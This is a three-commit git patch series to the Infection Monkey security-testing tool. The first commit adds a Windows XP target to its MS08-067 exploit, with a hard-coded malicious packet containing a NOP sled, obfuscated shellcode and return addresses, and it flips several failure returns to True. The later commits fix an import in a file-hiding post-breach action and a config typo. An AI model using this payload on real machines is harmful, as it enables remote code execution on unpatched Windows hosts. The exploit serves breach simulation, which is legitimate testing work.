From 731239f08df424395d4b56165b868e425ab34812 Mon Sep 17 00:00:00 2001
From: VakarisZ <vakarisz@yahoo.com>
Date: Fri, 28 Aug 2020 09:38:01 +0300
Subject: [PATCH 1/3] Added windows XP support for win_ms08_067.py and fixed
 exploited/not exploited logic

---
 .../infection_monkey/exploit/win_ms08_067.py  | 28 +++++++++++++++++--
 1 file changed, 25 insertions(+), 3 deletions(-)

diff --git a/monkey/infection_monkey/exploit/win_ms08_067.py b/monkey/infection_monkey/exploit/win_ms08_067.py
index d2ad58349..7e26198c6 100644
--- a/monkey/infection_monkey/exploit/win_ms08_067.py
+++ b/monkey/infection_monkey/exploit/win_ms08_067.py
@@ -50,6 +50,23 @@ OBFUSCATED_SHELLCODE = ("\xa9\xb6\x4a\x39\x56\x60\xb5\xba\xf6\xb2\xc0\x19\xc1\x6
 
 SHELLCODE = clarify(OBFUSCATED_SHELLCODE)
 
+XP_PACKET = ("\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43"
+             "\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01"
+             "\x00\x00\x5c\x00\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47"
+             "\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48"
+             "\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49"
+             "\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a"
+             "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x90"
+             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+             "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
+             "\x90\x90\x90\x90\x90\x90\x90" + SHELLCODE + "\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00"
+             "\x2e\x00\x5c\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x08\x04\x02"
+             "\x00\xc2\x17\x89\x6f\x41\x41\x41\x41\x07\xf8\x88\x6f\x41\x41\x41\x41\x41\x41\x41\x41"
+             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+             "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x90\x90\x90\x90\x90\x90\x90\x90"
+             "\xeb\x62\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\xe8\x03\x00\x00\x02\x00\x00"
+             "\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00")
+
 # Payload for Windows 2000 target
 PAYLOAD_2000 = '\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
 PAYLOAD_2000 += '\x41\x41\x41\x41\x41\x41\x41\x41'
@@ -82,6 +99,7 @@ PAYLOAD_2003 += '\xba\x77\xf9\x75\xbd\x77\x00\x00'
 class WindowsVersion(IntEnum):
     Windows2000 = 1
     Windows2003_SP2 = 2
+    WindowsXP = 3
 
 
 class SRVSVC_Exploit(object):
@@ -91,6 +109,7 @@ class SRVSVC_Exploit(object):
         self._port = port
         self._target = target_addr
         self._payload = PAYLOAD_2000 if WindowsVersion.Windows2000 == os_version else PAYLOAD_2003
+        self.os_version = os_version
 
     def get_telnet_port(self):
         """get_telnet_port()
@@ -129,6 +148,8 @@ class SRVSVC_Exploit(object):
         return sock
 
     def _build_dce_packet(self):
+        if self.os_version == WindowsVersion.WindowsXP:
+            return XP_PACKET
         # Constructing Malicious Packet
         dce_packet = '\x01\x00\x00\x00'
         dce_packet += '\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00'
@@ -157,7 +178,8 @@ class Ms08_067_Exploiter(HostExploiter):
     _TARGET_OS_TYPE = ['windows']
     _EXPLOITED_SERVICE = 'Microsoft Server Service'
     _windows_versions = {'Windows Server 2003 3790 Service Pack 2': WindowsVersion.Windows2003_SP2,
-                         'Windows Server 2003 R2 3790 Service Pack 2': WindowsVersion.Windows2003_SP2}
+                         'Windows Server 2003 R2 3790 Service Pack 2': WindowsVersion.Windows2003_SP2,
+                         'Windows 5.1': WindowsVersion.WindowsXP}
 
     def __init__(self, host):
         super(Ms08_067_Exploiter, self).__init__(host)
@@ -231,7 +253,7 @@ class Ms08_067_Exploiter(HostExploiter):
                     break
 
             if not remote_full_path:
-                return False
+                return True
 
         # execute the remote dropper in case the path isn't final
         if remote_full_path.lower() != self._config.dropper_target_path_win_32.lower():
@@ -251,7 +273,7 @@ class Ms08_067_Exploiter(HostExploiter):
             sock.send(("net user %s /delete\r\n" % (self._config.user_to_add,)).encode())
         except Exception as exc:
             LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", self.host, exc)
-            return False
+            return True
         finally:
             try:
                 sock.close()

From 33b9dae2139131f186474bad870c0e0ab33f5d97 Mon Sep 17 00:00:00 2001
From: Shay Nehmad <shay.nehmad@guardicore.com>
Date: Tue, 1 Sep 2020 14:46:53 +0300
Subject: [PATCH 2/3] Bugfix - missing import

---
 monkey/infection_monkey/post_breach/actions/hide_files.py | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/monkey/infection_monkey/post_breach/actions/hide_files.py b/monkey/infection_monkey/post_breach/actions/hide_files.py
index 081a18598..9dfe875eb 100644
--- a/monkey/infection_monkey/post_breach/actions/hide_files.py
+++ b/monkey/infection_monkey/post_breach/actions/hide_files.py
@@ -4,8 +4,9 @@ from infection_monkey.telemetry.post_breach_telem import PostBreachTelem
 from infection_monkey.utils.environment import is_windows_os
 from infection_monkey.utils.hidden_files import (cleanup_hidden_files,
                                                  get_commands_to_hide_files,
-                                                 get_commands_to_hide_folders,
-                                                 get_winAPI_to_hide_files)
+                                                 get_commands_to_hide_folders)
+from infection_monkey.utils.windows.hidden_files import \
+    get_winAPI_to_hide_files
 
 HIDDEN_FSO_CREATION_COMMANDS = [get_commands_to_hide_files,
                                 get_commands_to_hide_folders]

From e9a939e1f081b2ce699b3a330370a0634ad42b11 Mon Sep 17 00:00:00 2001
From: Shay Nehmad <shay.nehmad@guardicore.com>
Date: Tue, 1 Sep 2020 15:00:39 +0300
Subject: [PATCH 3/3] fix typo
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

(╯°□°）╯︵ ┻━┻
---
 monkey/monkey_island/cc/services/config.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/monkey/monkey_island/cc/services/config.py b/monkey/monkey_island/cc/services/config.py
index 02dd91381..10ce690c0 100644
--- a/monkey/monkey_island/cc/services/config.py
+++ b/monkey/monkey_island/cc/services/config.py
@@ -218,7 +218,7 @@ class ConfigService:
     def set_server_ips_in_config(config):
         ips = local_ip_addresses()
         config["internal"]["island_server"]["command_servers"] = \
-            ["%s:%d" % (ip, env_singleton.env.get_islaned_port()) for ip in ips]
+            ["%s:%d" % (ip, env_singleton.env.get_island_port()) for ip in ips]
         config["internal"]["island_server"]["current_server"] = "%s:%d" % (ips[0], env_singleton.env.get_island_port())
 
     @staticmethod